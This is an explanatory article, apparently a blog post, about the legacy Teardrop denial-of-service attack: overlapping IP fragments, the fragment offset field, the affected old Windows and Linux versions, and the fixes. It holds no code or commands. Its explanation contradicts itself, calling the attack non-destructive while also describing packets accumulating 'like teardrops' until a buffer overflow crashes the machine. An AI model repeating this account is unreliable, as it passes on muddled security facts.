Teardrop Attack

What Is It And How Does It Work?

As the name suggests, the Teardrop Attack works gradually by sending the fragmented packets to a target machine. It’s a type of a denial-of-service (DoS) attack which overwhelms the target machine with the incomplete data so that the victim crashes down.

In Teardrop Attack, fragmented packets that are sent in the to the target machine, are buggy in nature and the victim’s machine is unable to reassemble those packets due to the bug in the TCP/IP fragmentation.This DoS attack affects Windows 3.1, 95 and NT machines. It also affects Linux versions previous to 2.0.32 and 2.1.63.

Teardrop is a program that sends IP fragments to a machine connected to the Internet or a network. Teardrop exploits an overlapping IP fragment bug present in Windows 95, Windows NT and Windows 3.1 machines. The bug causes the TCP/IP fragmentation re-assembly code to improperly handle overlapping IP fragments. This attack has not been shown to cause any significant damage to systems, and a simple reboot is the preferred remedy. It should be noted, though, that while this attack is considered to be non-destructive, it could cause problems if there is unsaved data in open applications at the time that the machine is attacked. The primary problem with this is a loss of data.In this way, the packets keep on getting accumulated over the victim’s machine and finally due to the buffer overflow, the target machine crashes down.

How Teardrop Attack works?

Here, I am taking a reference from the Juniper’s technical publication to illustrate how does it work

As you can see in the above figure of IP header, which operates at the network layer, there is a field called fragment offset field.

Teardrop Attack and Fragment Offset:

Understand it like this — When a large amount of data is sent across the internet, the data is broken into the smaller fragments. Each of these fragments is assigned a number. When they reach the receiving end, these fragments are rearranged to reproduce the original data or message.To identify the sequencing of the fragments, the fragment offset field holds the necessary information using which the target machine rearranges the sequence.

However, in the Teardrop Attack, the fragment offset field is made buggy by the hacker so the victim’s machine is unable to find the relative fragments.So, as the name suggests, the buggy packets keep on accumulating at the victim’s side like teardrops and ultimately it leads to the machine crash.However, modern networking devices can detect this discrepancy in a fragmented packet. Once they detect the problem, they simply drop the packet.

How can you fix this vulnerability?

If you are experiencing teardrop attacks on a Windows based system, visit Windows Central's teardrop page, or EFnet's DoS Information Page to learn how to defend against this attack. If you are experiencing attacks on a Linux based system, upgrade to version 2.0.32 / 2.1.63 or later